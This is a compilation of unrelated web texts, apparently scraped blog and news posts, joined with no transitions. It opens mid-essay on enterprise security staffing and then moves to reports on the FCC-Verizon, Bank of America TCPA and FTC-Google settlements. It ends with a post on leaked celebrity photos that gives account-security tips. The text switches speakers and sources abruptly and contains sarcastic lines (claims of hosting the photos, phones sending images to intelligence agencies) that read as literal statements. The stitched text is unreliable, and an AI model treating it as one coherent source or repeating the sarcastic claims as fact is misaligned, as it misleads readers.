What makes this even more difficult for the security organization is that their core team is exactly 0.04% of the overall company staff. Their full staff complement, including recently hired members, is less than 5% of the total IT staff count. The security device-to-staffer ratio is horrible, their budget is insignificant, and for all intents and purposes the security function is relatively new compared with the rest of the enterprise. I'm not a statistician, or particularly good at math, but even I know those numbers don't work out well.
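To put those percentages in concrete terms, here's some back-of-the-envelope arithmetic with purely hypothetical headcounts (the real numbers aren't mine to share):

```python
# Purely illustrative headcounts -- the post does not disclose real numbers.
company_staff = 50_000
it_staff = 2_000

core_security_team = round(company_staff * 0.0004)  # 0.04% of the company
full_security_staff = round(it_staff * 0.05)        # just under 5% of IT

print(core_security_team)   # 20 people securing a 50,000-person company
print(full_security_staff)  # at most 100 security staff, all told
```

Scale the inputs however you like; the ratios stay ugly.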


Diversity Challenges

Security in the enterprise is largely about building and operationalizing repeatable patterns of process and methodology to achieve scale. This works well in even very large, but very centralized and uniform, enterprises. The problem is that when you get into enterprises that are extremely diverse in business practices, technologies, goals, and compliance initiatives, repeatable patterns fail to scale, since you end up building a new, unique set for every different piece of the organization.

In this situation, the only chance enterprise security has is local representation from inside the business. In my experience, though, you're not going to find many security experts within these businesses, which may have "an IT guy/gal" or three. The situation just keeps getting worse.

Think about this: from an operating platform perspective you may have some OS/2, lots of UNIX variants, Mac OS, Windows from WinNT 4.0 through Windows 8.1, and then some device-specific platforms like VxWorks. If you're lucky, all you have is Ethernet (Category 5/6) cabling and nothing else... Now add specialized programs, PLCs, and Industrial Control Systems (ICS), and it gets messy fast.

At this point it almost doesn't matter how many security resources you have, the only way you'll scale is automation.


The Catch-22

Sometimes things become a chicken-and-egg problem. In order to scale better with fewer resources, your security organization clearly needs more automation. The problem is that more automation tends to create the need for more security resources to manage it (you don't actually believe the marketing or sales hype that these things manage themselves, do you?). Either way, you don't have the people to do this.


Bad, Meet Worse

Where things go from bad to untenable is when business alignment and cooperation aren't ideal. As in real life, not all business units will be friendly or even want to deal with "corporate". In that case you're not only facing the impossible challenge of addressing the business's security issues, but you're fighting politics as well. Sometimes you just cannot win.

If you factor in that generally security isn't the most loved part of the IT organization because of its history of being "the no people" you quickly realize that the deck is heavily stacked against you. There are certainly ample opportunities to trip on your own untied shoelaces and fall flat on your face. The key to not doing this lies in a multi-step process which includes assessment, prioritization, buy-in, and effective operationalization.


Steering the Titanic by Committee

As the CISO or security leader of a highly decentralized enterprise, you're not going to get many easy wins. You're probably not going to do a very good job of preventing and preempting the next breach. Heck, you may not even be able to detect or respond in a timely fashion. But the key to not failing as hard is not to go it alone. Even if you have a centralized security team of 100+, you're still going to fall prey to these same challenges. You need support from the various edge cases in your enterprise structure. You need help from your corporate counterparts, and your outliers.

Cooperatively working towards better security is hard. It may be an order of magnitude harder than anything else you can do from a central control model - but if that's the only operating model you have available to you then it's time to make lemonade. In the next few posts I'll try to apply some of the lessons learned and recommendations from a series of these types of engagements. Maybe some of them will help you make better lemonade. Or figure out when it's time to move to a new lemonade stand.

FCC Announces 7.4 Million Dollar Settlement with Verizon

On September 3, 2014, the Federal Communications Commission announced that Verizon has agreed to pay $7.4 million to settle an FCC Enforcement Bureau investigation into Verizon’s use of personal information for marketing. The investigation revealed that Verizon had used customers’ personal information for marketing purposes over a multiyear period before notifying the customers of their right to opt out of such marketing.

In addition to the monetary penalty, the FCC’s Consent Decree, which is valid for three years, requires Verizon to:

  • designate a Compliance Officer;
  • develop and distribute a Compliance Manual to all covered personnel responsible for helping Verizon comply with the Consent Decree;
  • implement a training program for covered personnel that includes instructions about reporting any problems related to Verizon’s opt-out notices;
  • develop a procedure to place an opt-out notice on each customer invoice (either electronic or hard copy) sent to every customer for whom Verizon relies on opt-out consent; and
  • submit periodic Compliance Reports to the FCC Enforcement Bureau.

In announcing the Consent Decree, Travis LeBlanc, Acting Chief of the FCC’s Enforcement Bureau, emphasized that “[i]t is plainly unacceptable for any phone company to use its customers’ personal information for thousands of marketing campaigns without even giving them the choice to opt out.”

The Verizon settlement comes on the heels of another notable FCC settlement with Sprint Corporation.

Bank of America Finalizes 32 Million Dollar Settlement in TCPA Class Action

On September 2, 2014, a federal district court in California granted final approval to a settlement ending a class action against Bank of America (“BofA”) and FIA Card Services stemming from allegations that the defendants “engaged in a systematic practice of calling or texting consumers’ cell phones through the use of automatic telephone dialing systems and/or an artificial or prerecorded voice without their prior express consent, in violation of the Telephone Consumer Protection Act (“TCPA”).” The court granted preliminary approval to the settlement in December 2013.

Leading up to the settlement, a key dispute between the parties was whether BofA had obtained the requisite “prior express consent” to make autodialed or prerecorded calls to the plaintiffs’ cell phones. In the settlement, BofA denied all of the plaintiffs’ allegations and maintained that it did not violate the TCPA through its autodialed or prerecorded calls and text messages.

The court order certified a class of approximately seven million individuals who received allegedly unauthorized calls or text messages to a cellular telephone regarding a BofA credit card account or residential mortgage loan from 2007 through 2013. Due to the size of the class and the damages available under the TCPA, the court noted that, had the plaintiffs been victorious at trial, the potential amount of the award against the defendants could have caused post-trial concerns. The TCPA provides for statutory damages of $500 or $1,500 per unauthorized call or text.
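To see why the court flagged that: with roughly seven million class members and statutory damages of $500 to $1,500 per call or text, even the most conservative possible assumption (a single violating call per member, which the record does not establish) puts the exposure in the billions:

```python
class_members = 7_000_000
per_call_min, per_call_max = 500, 1_500  # TCPA statutory damages

# One call each is the floor; actual call counts could multiply this.
print(class_members * per_call_min)  # 3500000000  ($3.5 billion)
print(class_members * per_call_max)  # 10500000000 ($10.5 billion)
```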

This settlement is the latest in a string of recent settlements related to alleged violations of the TCPA. In the past few weeks, two other major financial institutions have agreed to settle TCPA class actions for tens of millions of dollars, though those settlements are still pending approval. Other entities that have agreed to multimillion-dollar settlements to end similar class actions this year include Best Buy Co., Inc. ($4.5 million in June 2014); Bank of the West ($3.3 million in June 2014); the Los Angeles Clippers ($5 million in June 2014); and T-Mobile US, Inc. ($5 million in April 2014).

Read the court order granting approval of the final settlement.

FTC Settles with Google for Kids’ In-App Purchases

On September 4, 2014, the Federal Trade Commission announced a proposed settlement with Google Inc. (“Google”) stemming from allegations that the company unfairly billed consumers for mobile app charges incurred by children. The FTC’s complaint alleges that since 2011, Google violated the FTC Act’s prohibition on unfair commercial practices by billing consumers for in-app charges made by children without the authorization of the account holder.

Google agreed to pay a minimum of $19 million to provide refunds to consumers. To the extent Google issues less than $19 million in refunds within the 12 months after the settlement becomes final, the balance will be remitted to the FTC for use in providing additional remedies to consumers or for return to the U.S. Treasury. Google also has agreed to modify its billing practices to ensure that it obtains express, informed consent from consumers prior to billing them for in-app charges.

This settlement is the FTC’s third case concerning unauthorized in-app charges by children. As we previously reported, in July, the FTC announced that it filed a complaint against Amazon.com, Inc. for failing to obtain the consent of parents or other account holders prior to billing them for in-app charges incurred by children. In January, the FTC announced a proposed settlement with Apple Inc. stemming from allegations that the company billed consumers for mobile app charges incurred by children without their parents’ consent. Apple agreed to pay a minimum of $32.5 million to provide refunds to consumers.

The agreement with Google is open for public comment until October 6, 2014.

Read more on the FTC’s Business Center and Consumer Information blogs.

Update: On December 5, 2014, the FTC approved the final settlement order with Google.

Red Letter Day for Onanists and Internet Fraudsters

Yesterday a number of explicit photographs of celebrities, including Jennifer Lawrence, were leaked on the Internet. I'll get to that in a moment. First, if you read no further, read this:

Don't go looking for these photographs, and don't click any links sent to you purporting to be them.

If you must look, we've hosted them all here. Seriously, we have been out a-searching since the news broke, in order to protect our users from the inevitable tide of malware links that has already begun to spring up. The major search engines work hard to keep malicious sites seeded with "current event" keywords from popping up, but this time it will be harder, as the sites offering these images will often be similar to those offering the malware.

Now I am going to break from the norm. Most security blogs include the advice "don't take nude photos". I'm not going to ask you to quit. If that's your bag, keep at it — but bear in mind that your photo collection is now worth more. It's worth more to an attacker who wants to populate their porn site, or to blackmail you. It is also worth more to you, for the peace of mind of keeping those images private.

If we said the answer was "don't do it" every time doing something on the Internet resulted in a problem, we wouldn't have Internet banking. Or the Internet, come to think of it. So no, you absolutely should store your personal photos on the Internet. You just need to take further steps to ensure they are secure.

These steps include:

1. Make sure you know where your photos are. Many phones now automatically send your images to the NSA/GCHQ etc. under the guise of backup. This can be turned off. Weigh your dismay at not having your photos anymore against the chance of them being stolen. Personally, I vote for backup, as anyone who pinches my pictures will find a heady combination of safari shots and pictures of serial numbers for things I need to fix. Remember any other backup services (Dropbox, Mozy, Backblaze, CrashPlan et al.) that you use here as well.

2. Secure the photos on-device. If your PC has no password and your phone regularly sits around unlocked, nobody needs to hack your backups. It seems obvious, but the proportion of people who take nude selfies is greater than the proportion who use a lock screen. Apparently.

3. Use a password you use nowhere else. No, really. I mean it this time. I know you ignored me when I said "use a different password everywhere". Look, I forgive you, because I like you. But this one is pretty serious. Don't reuse the password from a message board or your grocery shopping account.

4. Turn on "two step verification", "two factor authentication" or whatever anyone's calling it these days.

5. Secure the reset channel. Password resets are a good way to break into an account. That could mean email (the password and two-factor advice applies here too), phone (PIN-protect your voicemail!), or silly security questions that anyone with access to your Facebook can answer (make like Graham Cluley and tell them your first pet was called "9£!ttty7-").
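A footnote on points 3 and 5: you don't have to invent these secrets yourself. Any scripting language can generate a throwaway, never-reused password or nonsense security answer; a minimal Python sketch (the length and character set are arbitrary illustrative choices, not recommendations):

```python
import secrets
import string

def unique_secret(length: int = 20) -> str:
    """Generate a random secret, usable as a never-reused password
    or as a made-up answer to a 'security question'."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    # secrets (not random) draws from a cryptographically strong source.
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(unique_secret())  # different every run; stash it in a password manager
```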

A final word on this: watch for those malware links. They're already out there.